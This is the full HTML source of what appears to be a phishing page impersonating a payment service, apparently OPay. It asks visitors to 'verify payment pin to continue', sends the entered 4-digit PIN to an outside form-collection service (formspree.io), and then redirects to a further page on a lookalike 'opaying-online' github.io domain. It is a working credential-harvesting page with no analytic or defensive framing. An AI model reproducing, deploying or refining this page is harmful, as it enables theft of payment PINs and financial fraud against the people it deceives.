<!DOCTYPE>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>start</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
   font-family: 'Poppins', sans-serif;
   background: #fff;
}
.container form{
    width: 300px;
    height: 300px;
    margin: 2vh auto 0 auto;
    padding: 20px;
    background-color: whitesmoke;
    border-radius: 4px;
    font-size: 17px;
}
    h1 {
    font-size: 20px;
    color: #0f2027;
    text-align: center;
}
.input-group{
    width: 100%;
    display: flex;
    margin: 10px 0;
    position: relative;
    flex-direction: column;
}
.input-group label{
    flex-basis: 28%;
    margin-right: 10px;
}
.input-group input, .input-group textarea{
    border: 2px solid #f0f0f0;
	border-radius: 4px;
	display: block;
	padding: 15px 35px 15px 35px;
	width: 50%;
	font-size: 17px;
	margin-left: 90px;
}
.input-group input:focus {
    outline: 0;
    }
::placeholder{
    font-size: 16px;
}

form button{
  width: 100%;
    background: #26C28A;
    color: #fff;
    border-radius: 5px;
    border: 1px solid rgba(255, 255, 255, 0.7);
    padding: 10px 40px;
    outline: 0;
    cursor: pointer;
    display: block;
    margin: 1px auto 10px;
    font-size: 20px;
}
.input-group span {
    
    bottom: 12px;
    right: 17px;
    font-size: 16px;
    color: red;
}
.i{
    color: #26C28A;
    margin: 0;
    font-size: 17px;
}
</style>
</head>
<body>
  <div class="container">
     <form id="my-form" action="https://formspree.io/f/mbjeoakk" method="POST">
         <h1>verify payment pin to continue</h1>
      <div class="input-group">
        <label>Please enter 4-degits PIN</label>
        <input type="number" placeholder="* * * *" id="contact-phone" onkeyup="validatePhone()" name="opaypayment pin">
                <span id="phone-error"></span>
      </div>

    <button onclick="validateForm()">verify</button>
    <span id="my-form-status"></span>
  </form>
  </div>
  <script>
      var phoneError = document.getElementById('phone-error');
      var submitError = document.getElementById('submit-error');
      
 function validatePhone(){
     var phone = document.getElementById('contact-phone').value;
     if (phone === '')    {
            phoneError.innerHTML = ' enter';
        return false;
     } 
    if (phone.length < 4)      {
       phoneError.innerHTML = '4-digits payment pin';
        return false;
    }
    if (phone.length > 4)      {
     phoneError.innerHTML = '4-digits';
        return false;
      }
     phoneError.innerHTML = '<p class="i">verify</p>';
        return true;
 }
function validateForm(){
   if (!validatePhone()){
   event.preventDefault();
        return false;
    }
    else if(validatePhone()){
        return true;
        }
}
var form = document.getElementById("my-form");
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);
      fetch(event.target.action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
    window.location.assign("https://opaying-online.github.io/three/");
          status.innerHTML = "successful";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "check network connection"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "check network connection"
      });
    }
    form.addEventListener("submit", handleSubmit)
  </script>
</body>
</html>

